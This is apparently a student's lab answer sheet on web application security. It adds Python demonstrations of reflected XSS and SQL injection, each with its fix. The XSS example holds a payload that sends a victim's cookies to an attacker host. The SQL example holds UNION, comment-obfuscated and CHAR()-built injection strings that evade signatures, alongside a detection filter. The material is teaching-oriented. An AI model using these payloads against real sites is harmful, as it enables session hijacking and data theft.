IS4560 Lab 5

In: Computers and Technology

Submitted By TermMaster
1. It is critical to perform a penetration test on a web application before it goes into production so that vulnerabilities are found and fixed before the application is exposed on the internet to malicious attacks.
2. A cross-site scripting (XSS) attack enables an attacker to inject client-side script into web pages that are then viewed by other users, so the script runs in the victims' browsers in the context of the trusted site.
3. In a reflected XSS attack the malicious script is carried in the request itself, typically in a URL parameter, and the server echoes it back unsanitized in its response to that same request.
4. The common obfuscation methods used in most real-world SQL injection attacks hide the injected keywords from signature-based filters: encoding the payload (URL or hex encoding), breaking keywords apart with inline comments, varying letter case, and building strings at run time with built-in SQL string functions such as CHAR() and CONCAT() so that no quoted literal or recognisable keyword appears in the raw input.
5. SQL injection is the attack most likely to extract private data elements from a database, because the injected input becomes part of a query that runs directly against the database with the application's privileges.
6. If I could monitor when SQL injections are performed on an SQL database, I would recommend well-coordinated and regularly audited security checks as a security countermeasure for monitoring the production SQL database.
7. To identify known software vulnerabilities and exploits on IIS and Apache, I would create a policy that requires regular audits, penetration tests, and continuous monitoring.
8. To ensure that my organization incorporates penetration testing and web application testing as part of its implementation procedures, I would include them in the policy and make sure that all security staff know that they are requirements.
9. Some other security countermeasures that I recommend for web site and web application deployment, to ensure the C-I-A of the web application, are:
• Regular security audits
• Penetration testing
• Security awareness training
• IDS/IPS
• Use of a DMZ
• Strict access policies
10. The security team or CIO is responsible and accountable for the C-I-A of production web applications and web…
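The reflected XSS described in answers 2 and 3, shown as an added example that is not part of the original lab write-up. The search page, the request URL and the function names (render_results_vulnerable, render_results_safe, query_param, reflects_script) are all constructed here for illustration: the vulnerable renderer echoes the q parameter straight into the HTML, and the hardened one HTML-escapes it before it reaches the element body.

```python
"""Added example, not from the original lab answers: reflected XSS in a search page.
Everything here (page template, URL, function names) is constructed for illustration."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed page template; {q} is where the search term is reflected.
PAGE = "<html><body><h1>Results for: {q}</h1><p>No products matched.</p></body></html>"


def query_param(url, name):
    """Pull one query-string parameter out of a request URL.

    In a reflected XSS the payload travels in exactly this spot: it arrives
    with the request and is never stored on the server.
    """
    params = parse_qs(urlsplit(url).query)
    return params.get(name, [""])[0]


def render_results_vulnerable(url):
    """Vulnerable: the client-controlled value is concatenated into HTML as-is."""
    return PAGE.format(q=query_param(url, "q"))


def render_results_safe(url):
    """Hardened: escape <, >, &, " and ' so the value is rendered as text, not markup.

    This encoding is correct for an HTML element body only; attribute, URL and
    JavaScript contexts each need their own encoding.
    """
    return PAGE.format(q=escape(query_param(url, "q"), quote=True))


def reflects_script(html_out):
    """Crude response check: does the page contain an unescaped <script tag?"""
    return "<script" in html_out.lower()


# Constructed attacker link. Percent-decoded, q is:
#   <script>document.location='http://attacker.example/?c='+document.cookie</script>
ATTACK_URL = (
    "http://shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F"
    "%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E"
)

if __name__ == "__main__":
    print(render_results_vulnerable(ATTACK_URL))
    print(render_results_safe(ATTACK_URL))
```

The attacker never touches the server: the victim only has to click the crafted link, and the server's own response delivers the script. Output encoding per context is the fix; a Content-Security-Policy header is a worthwhile second layer but does not replace it.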
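The SQL injection points in answers 4, 5 and 6, worked through as one added example that is not part of the original lab answers. The SQLite tables, rows, payloads and function names are all constructed here: lookup_vulnerable() builds its query by string concatenation, a UNION payload pulls rows out of a private users table through it, an inline-comment variant slips past a naive keyword signature while a normalised signature still catches it (the kind of check a monitoring layer can run over logged parameters), a CHAR()-built variant avoids quoted literals entirely, and lookup_safe() shows the parameterised query that stops all of them.

```python
"""Added example, not from the original lab answers: SQL injection against a
product lookup, obfuscated variants, a monitoring check, and the parameterised fix.
All tables, rows, payloads and names are constructed for illustration."""
import re
import sqlite3


def make_db():
    """Constructed sample data: a public products table and a private users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', 'h1'), (2, 'bob', 'h2');
        """
    )
    return conn


def lookup_vulnerable(conn, product_name):
    """Vulnerable: the client value becomes part of the SQL text itself."""
    sql = "SELECT name, price FROM products WHERE name = '" + product_name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_name):
    """Hardened: parameter binding keeps the client value as data, never as SQL."""
    sql = "SELECT name, price FROM products WHERE name = ?"
    return conn.execute(sql, (product_name,)).fetchall()


# Plain UNION injection: closes the literal, appends a second SELECT that
# returns two columns from the private table, and comments out the trailing quote.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users-- "

# Same attack with inline comments instead of spaces between keywords, so a
# signature looking for "UNION<whitespace>SELECT" never sees that sequence.
OBFUSCATED_PAYLOAD = "x'/**/UNION/**/SELECT/**/username,password_hash/**/FROM/**/users-- "

# Built-in string function instead of a quoted literal: char(97,108,105,99,101) is 'alice',
# so a filter that blocks a second single quote in the input sees nothing.
CHAR_PAYLOAD = (
    "x' UNION SELECT username, password_hash FROM users "
    "WHERE username = char(97,108,105,99,101)-- "
)

# Signature a monitoring layer might apply to logged parameters or queries.
SIGNATURE = re.compile(r"\bunion\b\s+\bselect\b", re.IGNORECASE)


def naive_filter(value):
    """Signature match on the raw input: bypassed by the comment-obfuscated payload."""
    return bool(SIGNATURE.search(value))


def normalize(value):
    """Strip inline comments and collapse whitespace before matching."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)
    return re.sub(r"\s+", " ", value)


def normalized_filter(value):
    """Signature match after normalisation: catches the obfuscated form too."""
    return bool(SIGNATURE.search(normalize(value)))


if __name__ == "__main__":
    db = make_db()
    print("normal:", lookup_vulnerable(db, "widget"))
    print("union:", lookup_vulnerable(db, UNION_PAYLOAD))
    print("obfuscated:", lookup_vulnerable(db, OBFUSCATED_PAYLOAD))
    print("char():", lookup_vulnerable(db, CHAR_PAYLOAD))
    print("safe:", lookup_safe(db, UNION_PAYLOAD))
    print("naive flags obfuscated:", naive_filter(OBFUSCATED_PAYLOAD))
    print("normalized flags obfuscated:", normalized_filter(OBFUSCATED_PAYLOAD))
```

The signature functions are a detection aid for monitoring, not a control: a real deployment would also percent-decode and hex-decode before matching, and attackers keep finding encodings the filter has not seen. Parameterised queries remove the problem rather than pattern-matching it.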
